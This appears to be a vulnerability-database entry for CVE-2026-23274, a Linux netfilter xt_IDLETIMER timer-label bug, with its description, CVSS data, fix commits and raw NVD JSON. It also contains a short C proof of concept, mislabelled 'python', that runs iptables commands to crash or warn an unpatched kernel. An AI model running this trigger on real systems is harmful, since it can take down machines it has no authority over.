CVE-2026-23274

Description

In the Linux kernel, the following vulnerability has been resolved: netfilter: xt_IDLETIMER: reject rev0 reuse of ALARM timer labels IDLETIMER revision 0 rules reuse existing timers by label and always call mod_timer() on timer->timer. If the label was created first by revision 1 with XT_IDLETIMER_ALARM, the object uses alarm timer semantics and timer->timer is never initialized. Reusing that object from revision 0 causes mod_timer() on an uninitialized timer_list, triggering debugobjects warnings and possible panic when panic_on_warn=1. Fix this by rejecting revision 0 rule insertion when an existing timer with the same label is of ALARM type.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-23274
 * Trigger: Reuse an ALARM timer label with a non-ALARM (rev0) timer.
 * Effect: Kernel panic or debug_object warning.
 */

#include <stdio.h>
#include <stdlib.h>

int main() {
    // Step 1: Create a revision 1 ALARM timer
    printf("[*] Creating ALARM timer (rev1) with label 'vuln_label'...\n");
    system("iptables -A OUTPUT -j IDLETIMER --timeout 5 --label vuln_label --alarm");

    // Step 2: Attempt to create a revision 0 timer with the same label
    // This triggers mod_timer on uninitialized memory in vulnerable kernels.
    printf("[*] Creating standard timer (rev0) with label 'vuln_label'...\n");
    system("iptables -A OUTPUT -j IDLETIMER --timeout 10 --label vuln_label");

    printf("[+] Exploit triggered. Check kernel logs for panic/warning.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23274/
[4] VulDB https://vuldb.com/cve/CVE-2026-23274
[5] https://git.kernel.org/stable/c/144f88054ba0180467356f40895bd660b5dceeec
[6] https://git.kernel.org/stable/c/28c7cfaf0c0ab17cbd7754092116fd1af45271f9
[7] https://git.kernel.org/stable/c/329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf
[8] https://git.kernel.org/stable/c/32e937dc6e97f5ed3cdfe3fc0b2b19a05e23fa44
[9] https://git.kernel.org/stable/c/54080355999381fed4a26129579a5765bab87491
[10] https://git.kernel.org/stable/c/5e7ece24c5cb75a60402aad4d803c7898ea40aa9
[11] https://git.kernel.org/stable/c/f228b9ae2a7e84d1153616d8e71c4236cb1f1309
[12] https://git.kernel.org/stable/c/f5ef97c13165542480a6ffdbe6f09f40bbb7cbf1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23274", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-20T09:16:13.077", "lastModified": "2026-04-18T09:16:15.797", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: xt_IDLETIMER: reject rev0 reuse of ALARM timer labels\n\nIDLETIMER revision 0 rules reuse existing timers by label and always call\nmod_timer() on timer->timer.\n\nIf the label was created first by revision 1 with XT_IDLETIMER_ALARM,\nthe object uses alarm timer semantics and timer->timer is never initialized.\nReusing that object from revision 0 causes mod_timer() on an uninitialized\ntimer_list, triggering debugobjects warnings and possible panic when\npanic_on_warn=1.\n\nFix this by rejecting revision 0 rule insertion when an existing timer with\nthe same label is of ALARM type."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnetfilter: xt_IDLETIMER: rechazar la reutilización de rev0 de etiquetas de temporizador ALARM\n\nLas reglas de la revisión 0 de IDLETIMER reutilizan temporizadores existentes por etiqueta y siempre llaman a mod_timer() en timer-&gt;timer.\n\nSi la etiqueta fue creada primero por la revisión 1 con XT_IDLETIMER_ALARM, el objeto utiliza semántica de temporizador de alarma y timer-&gt;timer nunca se inicializa. Reutilizar ese objeto de la revisión 0 causa mod_timer() en una timer_list no inicializada, lo que activa advertencias de debugobjects y un posible pánico cuando panic_on_warn=1.\n\nSolucione esto rechazando la inserción de reglas de la revisión 0 cuando un temporizador existente con la misma etiqueta es de tipo ALARM."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/144f88054ba0180467356f40895bd660b5dceeec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/28c7cfaf0c0ab17cbd7754092116fd1af45271f9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/32e937dc6e97f5ed3cdfe3fc0b2b19a05e23fa44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/54080355999381fed4a26129579a5765bab87491", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5e7ece24c5cb75a60402aad4d803c7898ea40aa9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f228b9ae2a7e84d1153616d8e71c4236cb1f1309", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/f5ef97c13165542480a6ffdbe6f09f40bbb7cbf1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}